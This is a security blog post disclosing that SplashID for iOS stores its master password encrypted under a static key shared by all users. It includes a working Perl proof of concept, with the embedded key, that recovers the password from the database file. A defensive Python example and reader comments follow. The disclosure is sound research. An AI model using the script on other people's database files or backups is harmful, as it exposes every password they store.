SplashID for iOS by @SplashData stores master password inside database: #security #fail

While at Black Hat Europe 2012 I attended an excellent talk by two Elcomsoft researchers. They investigated the security of mobile password managers. Not surprisingly, they are not all as safe as they should be. Some (free ones) do not bother to encrypt the stored passwords at all. Others fail to protect the master password to the database from being easily brute forced. In particular, relying on PKCS7 padding lets each password guess be checked cheaply, which makes brute forcing very fast (up to 50 million password guesses per second).

The most interesting result to me was the discovery that SplashID for iOS stores the master password inside the very database that password is meant to protect. It is encrypted, but with a static key that is embedded in the program and is the same for all users. Based on this research I was able to write a proof of concept that takes the SplashIDDataBase.db file (from a jailbroken iPhone or iPad, or from an iTunes backup) and displays the password for the database. With this it is trivial for an attacker with access to the SplashIDDataBase.db file to retrieve the master password and use it to read all the entries stored in the database. The script is shown below and can be downloaded here.

It seems that SplashData made a similar faux pas with SplashID Enterprise Safe. This makes me fear the worst for the other members of the SplashID software family.

This all shows that closed source security products are very hard to trust. Independent review is always needed to make sure no obvious vulnerabilities exist.

Here is the proof of concept code:

#!/usr/bin/perl
# Proof of concept: recover the SplashID master password from SplashIDDataBase.db.
# The password is stored Blowfish-encrypted under a static key that is identical
# for every installation, so possession of the database file is enough.

use strict;
use warnings;
use DBI;
use Crypt::Blowfish;

# Static key embedded in the SplashID binary.
my $key = "g.;59?^/0n1X*{OQlRwy";

# Open the SQLite database (file taken from the device or an iTunes backup).
my $dbh = DBI->connect("dbi:SQLite:SplashIDDataBase.db")
    or die "Cannot connect: $DBI::errstr";

# The encrypted master password is the PASSWORD column of DATABASEINFOTABLE.
my $sth = $dbh->prepare("SELECT PASSWORD FROM DATABASEINFOTABLE");
$sth->execute;
my $ref = $sth->fetchrow_hashref;
$sth->finish;
$dbh->disconnect;

my $cryptpwd = $ref->{PASSWORD};
die "No PASSWORD value found in DATABASEINFOTABLE\n" unless defined $cryptpwd;

# Blowfish is a 64-bit block cipher: decrypt the stored value 8 bytes at a time (ECB).
my $cipher = Crypt::Blowfish->new($key);

for (my $i = 0; $i < length($cryptpwd); $i += 8) {
    print $cipher->decrypt(substr($cryptpwd, $i, 8));
}
print "\n";
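By contrast, here is how a master password can be checked without ever writing it (or anything decryptable back to it) into the database. This is an added example written for this post, not the author's script and not how SplashID or any other product actually works; it assumes PBKDF2-HMAC-SHA256 with a constructed iteration count and a 16-byte random salt, and the names create_record and unlock are hypothetical.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Constructed parameters for this example (a real product would tune them).
KDF_ITERATIONS = 100_000
SALT_LEN = 16
HALF = 32  # first 32 bytes of KDF output = verifier, last 32 = data-encryption key


def _derive(master_password: str, salt: bytes, iterations: int) -> bytes:
    """Slow, salted KDF: every password guess costs an attacker this much work,
    instead of one cheap block decrypt plus a padding check."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"),
                               salt, iterations, dklen=2 * HALF)


def create_record(master_password: str) -> Tuple[dict, bytes]:
    """Return (what to store in the database, data key to keep only in memory).

    Unlike an encrypted copy of the password under a program-wide static key,
    the stored verifier cannot be turned back into the password, and knowing
    it does not yield the data key either.
    """
    salt = os.urandom(SALT_LEN)
    derived = _derive(master_password, salt, KDF_ITERATIONS)
    record = {"salt": salt, "iterations": KDF_ITERATIONS, "verifier": derived[:HALF]}
    return record, derived[HALF:]


def unlock(record: dict, candidate: str) -> Optional[bytes]:
    """Re-derive from the candidate; return the data key on a match, else None.

    Success is decided by a constant-time comparison against a dedicated
    verifier, not by a side effect such as valid PKCS7 padding after decryption.
    """
    derived = _derive(candidate, record["salt"], record["iterations"])
    if not hmac.compare_digest(derived[:HALF], record["verifier"]):
        return None
    return derived[HALF:]
```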

3 comments on “SplashID for iOS by @SplashData stores master password inside database: #security #fail”

  1. Have you tried this on the Mac desktop app? In some senses, that’s a higher risk as that OS is not as tightly sandboxed.

  2. The Mac desktop uses a different type of database. I don’t know if they made the same error there. Please note that the SplashID mobile database is present in iTunes backups, so still very vulnerable.

  3. I wonder why they didn’t review the eWallet password keeper on the iPhone.
